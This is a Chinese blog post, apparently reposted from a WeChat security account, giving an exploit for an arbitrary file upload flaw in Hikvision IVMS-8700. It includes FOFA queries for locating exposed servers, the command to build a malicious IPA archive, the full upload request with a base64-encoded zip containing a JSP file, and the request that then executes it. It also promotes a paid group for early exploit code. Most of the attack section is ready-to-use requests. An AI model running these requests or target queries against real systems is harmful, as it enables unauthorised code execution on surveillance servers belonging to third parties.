Hikvision IVMS-8700 任意文件上传

2024年1月3日12:40:05评论246 views字数 2405阅读8分1秒阅读模式

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习交流使用，如若非法他用，与平台和本文作者无关，需自行负责！

漏洞概述

Hikvision IVMS-8700 getPic接口存在漏洞，可上传恶意IPA文件至服务器，执行脚本文件。

空间搜索语法

FoFa

body="/home/locationIndex.action"

header="ISMS_8700_Sessionname"

icon_hash="-911494769"

利用过程

登录页面如下

Hikvision IVMS-8700 任意文件上传

需要先制作一个IPA

首先需要准备如下文件路径，PetrelHD.app为空目录

Hikvision IVMS-8700 任意文件上传

需要使用linux系统或者mac系统，使用如下命令生成IPA文件。

zip -r 压缩后的文件名称 需要压缩的目录zip -r puye.ipa ha982

Hikvision IVMS-8700 任意文件上传

然后使用Burp的paste from file，粘贴到请求包中。

上传数据包如下：

POST /msp/home/upload.action;getPic?type=ios HTTP/1.1Host:  User-Agent: MicroMessengerContent-Length: 1705Accept-Encoding: gzip, deflate, brConnection: closeContent-Type: multipart/form-data; boundary=B9574fCFXJ1XzHDBvPOO
--B9574fCFXJ1XzHDBvPOOContent-Disposition: form-data; name="type"
ios--B9574fCFXJ1XzHDBvPOOContent-Disposition: form-data; name="file"; filename="UbhwO.ipa"Content-Type: None
base64_decode(UEsDBAoAAAAAADsXnVcAAAAAAAAAAAAAAAAGABwAaGE5ODIvVVQJAAMBfI5lE3yOZXV4CwABBOgDAAAE6AMAAFBLAwQKAAAAAAA7F51XAAAAAAAAAAAAAAAADQAcAGhhOTgyL29ld3F1MS9VVAkAAwF8jmUTfI5ldXgLAAEE6AMAAAToAwAAUEsDBAoAAAAAADsXnVcAAAAAAAAAAAAAAAAaABwAaGE5ODIvb2V3cXUxL1BldHJlbEhELmFwcC9VVAkAAwF8jmUTfI5ldXgLAAEE6AMAAAToAwAAUEsDBBQAAAAIAFdGb1TifxKeVwAAAG4AAAAVABwAaGE5ODIvb2V3cXUxL3Rlc3QuanNwVVQJAAOlizBiAXyOZXV4CwABBOgDAAAE6AMAALPJKMnNsePlsslITUyxsynJLMlJtfNIzcnJVwjPL8pJsdGHCNnogxUAFSblp1QCaSQ1ijZJRfogKVVervzSEr2Cosy8kpw8DSWImpDU4hIlTWteLlU7AFBLAQIeAwoAAAAAADsXnVcAAAAAAAAAAAAAAAAGABgAAAAAAAAAEADtQQAAAABoYTk4Mi9VVAUAAwF8jmV1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAAA7F51XAAAAAAAAAAAAAAAADQAYAAAAAAAAABAA7UFAAAAAaGE5ODIvb2V3cXUxL1VUBQADAXyOZXV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAADsXnVcAAAAAAAAAAAAAAAAaABgAAAAAAAAAEADtQYcAAABoYTk4Mi9vZXdxdTEvUGV0cmVsSEQuYXBwL1VUBQADAXyOZXV4CwABBOgDAAAE6AMAAFBLAQIeAxQAAAAIAFdGb1TifxKeVwAAAG4AAAAVABgAAAAAAAEAAAD2gdsAAABoYTk4Mi9vZXdxdTEvdGVzdC5qc3BVVAUAA6WLMGJ1eAsAAQToAwAABOgDAABQSwUGAAAAAAQABABaAQAAgQEAAAAA)
--B9574fCFXJ1XzHDBvPOO--

Hikvision IVMS-8700 任意文件上传

访问上传文件路径如下：

GET /msp/upload/ios/UbhwO/ha982/oewqu1/test.jsp HTTP/1.1Host:  User-Agent: MicroMessengerConnection: closeCookie: ISMS_8700_Sessionname=28E46BEC5F758BD4ED480783ACD41C52Accept-Encoding: gzip, deflate, br

Hikvision IVMS-8700 任意文件上传

nuclei poc

Hikvision IVMS-8700 任意文件上传

获取脚本关注本公众号后发送：ivms2创

双旦福利

考虑到团队运营成本和公众号福利发放，创建知识星球欢迎各位师傅打赏💰后期会用打赏的资金去做福利。星球的性价比真的比较可观，绝对不会因为某些身外之物水文章，安全圈很小，主要是和师傅们交个朋友。还请各位师傅监督团队后边的表现，将心比心！

进入星球你能直接收获到：

优先于公众号的POC更新（提前一两周~~）
定制化的成品工具开发
私人定制的客户需求（要求不要太过分呦~~）
实战技巧、攻防思路
杂七杂八的技术小福利
根据能力不定期的星球内部抽奖
更多漏洞利用Tips

给各位师傅呈上券～

Hikvision IVMS-8700 任意文件上传

进入星球直接能学习到这些漏洞：

Hikvision IVMS-8700 任意文件上传

✓

关注我们

原文始发于微信公众号（天澜实验室）：Hikvision IVMS-8700 任意文件上传

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Hikvision IVMS-8700 任意文件上传

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

WordPress未授权任意文件读取_CVE-2025-2294 POC

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

DataEase H2 JDBC远程代码执行漏洞CVE-2025-32966

金盘移动图书馆系统信息泄露漏洞

Netgear信息泄露漏洞

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

OpenSourceMatters Joomla 未授权SQL注入漏洞

某代理商管理系统存在RCE漏洞

发表评论

在线咨询

微信